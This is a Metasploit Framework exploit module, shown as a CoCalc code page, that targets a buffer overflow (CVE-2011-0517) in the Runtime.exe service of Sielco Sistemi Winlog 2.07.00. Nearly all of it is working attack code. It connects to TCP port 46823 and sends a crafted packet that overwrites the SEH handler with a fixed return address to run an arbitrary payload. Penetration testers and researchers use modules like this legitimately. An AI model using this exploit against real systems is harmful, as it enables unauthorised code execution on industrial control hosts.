Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/winlog_runtime.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking
8
9
include Msf::Exploit::Remote::Tcp
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Sielco Sistemi Winlog Buffer Overflow',
17
'Description' => %q{
18
This module exploits a buffer overflow in Sielco
19
Sistem Winlog <= 2.07.00. When sending a specially formatted
20
packet to the Runtime.exe service, an attacker may be able to
21
execute arbitrary code.
22
},
23
'Author' => [ 'Luigi Auriemma', 'MC' ],
24
'License' => MSF_LICENSE,
25
'References' => [
26
[ 'CVE', '2011-0517' ],
27
[ 'OSVDB', '70418'],
28
[ 'URL', 'http://aluigi.org/adv/winlog_1-adv.txt' ],
29
[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-017-02']
30
],
31
'Privileged' => false,
32
'DefaultOptions' => {
33
'EXITFUNC' => 'process',
34
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
35
},
36
'Payload' => {
37
'Space' => 450,
38
'BadChars' => "\x00\x20\x0a\x0d",
39
'StackAdjustment' => -3500,
40
},
41
'Platform' => 'win',
42
'Targets' => [
43
[ 'Winlog Lite 2.07.00', { 'Ret' => 0x011946de } ],
44
],
45
'DefaultTarget' => 0,
46
'DisclosureDate' => '2011-01-13',
47
'Notes' => {
48
'Reliability' => UNKNOWN_RELIABILITY,
49
'Stability' => UNKNOWN_STABILITY,
50
'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
}
52
)
53
)
54
55
register_options([Opt::RPORT(46823)])
56
end
57
58
def exploit
59
connect
60
61
data = [0x02].pack('C') # opcode
62
data << [0x0101].pack('n')
63
data << rand_text_alpha_upper(588)
64
data << generate_seh_payload(target.ret)
65
66
print_status("Trying target #{target.name}...")
67
sock.put(data)
68
69
handler
70
disconnect
71
end
72
end
73
74